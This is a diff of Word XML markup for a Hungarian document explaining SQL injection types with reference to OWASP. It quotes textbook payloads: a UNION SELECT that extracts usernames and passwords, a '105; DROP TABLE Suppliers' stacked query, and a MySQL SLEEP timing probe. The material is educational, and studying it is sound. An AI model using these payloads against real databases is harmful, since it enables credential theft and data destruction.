-        <w:t xml:space="preserve">A </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>téma</w:t>
+        <w:t>A téma</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4340,7 +4061,6 @@
         </w:rPr>
         <w:t>megnevezés</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -4409,35 +4129,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">The Open Web </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Application</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Security</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Project</w:t>
+        <w:t>The Open Web Application Security Project</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4607,52 +4299,119 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">' UNION SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>' UNION SELECT username, password FROM user</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>username</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>s</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve">-- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">megadása </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">bemeneti paraméterként </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az alábbi SQL lekérdezést futtathatja amennyiben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a bemenet sérülékeny</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">létezik </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>users</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tábla, valamint </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>user</w:t>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> oszlop:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4660,263 +4419,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[1]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">megadása </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">bemeneti paraméterként </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">az alábbi SQL lekérdezést futtathatja amennyiben </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a bemenet sérülékeny</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">létezik </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>users</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tábla, valamint </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>username</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> és </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> oszlop:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>description</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>products</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>category</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = ’</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Gifts</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">’ UNION SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>username</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>users</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -5054,33 +4558,18 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>(in-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>band</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>classic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>(in-band</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, classic</w:t>
+      </w:r>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SQLi</w:t>
+        <w:t xml:space="preserve"> SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="8"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5360,48 +4849,46 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">105; DROP TABLE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>105; DROP TABLE Suppliers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tényleges </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lekérdezés </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Suppliers</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[2]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Így a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">tényleges </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">lekérdezés </w:t>
+        <w:t>SELECT</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5409,7 +4896,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5417,7 +4904,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>*</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5425,7 +4912,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>*</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5433,7 +4920,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>FROM</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5441,7 +4928,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>FROM</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5449,25 +4936,23 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Users</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Users</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>WHERE</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5475,7 +4960,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>WHERE</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5483,25 +4968,23 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>UserId</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>UserId</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5509,7 +4992,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>=</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5517,7 +5000,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>105;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5525,7 +5008,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>105;</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5533,7 +5016,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>DROP</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5541,7 +5024,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>DROP</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5549,7 +5032,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>TABLE</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5557,7 +5040,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>TABLE</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5565,16 +5048,15 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Su</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Su</w:t>
+        <w:t>s</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5582,17 +5064,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>ppliers</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
@@ -5700,21 +5173,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>error-based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (error-based)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5931,31 +5390,19 @@
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>blind</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>inferential</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, inferential</w:t>
+      </w:r>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SQLi</w:t>
+        <w:t xml:space="preserve"> SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="9"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6100,21 +5547,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>boolean-based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (boolean-based)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6258,97 +5691,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>title</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>description</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>doby</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>items</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>=</w:t>
+        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6591,21 +5934,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>time-based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
+        <w:t xml:space="preserve">(time-based) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6649,19 +5978,11 @@
         </w:rPr>
         <w:t xml:space="preserve">például </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>MySQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-ben a legkézenfekvőbb megoldást a </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">MySQL-ben a legkézenfekvőbb megoldást a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6685,7 +6006,6 @@
         </w:rPr>
         <w:t xml:space="preserve">SELECT * FROM </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6694,79 +6014,79 @@
         </w:rPr>
         <w:t>card</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> WHERE id=1-SLEEP(15)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Következő lépésként például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>=1-SLEEP(15)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [5]</w:t>
